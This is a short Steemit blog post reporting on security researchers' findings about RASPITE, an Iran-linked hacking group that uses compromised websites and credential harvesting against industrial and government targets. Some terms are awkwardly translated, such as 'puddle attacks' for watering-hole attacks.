The Iran-linked APT group RASPITE is targeting US, Middle East, Europe, and East Asia

in attack •  6 years ago 

Hacker group operating outside of Iran, called RASPITE, has been targeting facilities in the United States, Europe, the Middle East and East Asia. The organization has been active since at least 2017, and researchers have discovered attacks on the Middle East government and other types of organizations.

Last week, Symantec researchers released a detailed report on the activities of the cyber-spy team based on the tracking of the Leafminer organization. The researchers said the organization’s attack could be more extensive and they found a case in Iran. A list of 809 targets written in Persian. The list is grouped according to their interest in the region and industry, targeting the United Arab Emirates, Qatar, Bahrain, Egypt, and Afghanistan. The systems for these targets have been scanned by attackers.

Now Dragos researchers have confirmed that it is RASPITE that has been targeting industrial control systems, and hackers have also visited the US power sector.

Hackers use hacked websites to conduct puddle attacks to provide potential victims with the content of interest. The RASPITE attack looks similar to attacks like DYMALLOY and ALLANITE, where hackers collect Windows credentials by injecting a website link to prompt for SMB connections. The attacker then deploys a script to install malware that connects to C&C ads and then lets the attacker take control of the infected computer.

According to Dragos, even though RASPITE is primarily targeted at ICS systems, there is no news that such devices are subject to devastating attacks.


Authors get paid when people like you upvote their post.
If you enjoyed what you read here, create your account today and start earning FREE STEEM!
Sort Order:  

Congratulations @alanna27! You have completed the following achievement on Steemit and have been rewarded with new badge(s) :

Award for the number of posts published

Click on the badge to view your Board of Honor.
If you no longer want to receive notifications, reply to this comment with the word STOP

Do you like SteemitBoard's project? Then Vote for its witness and get one more award!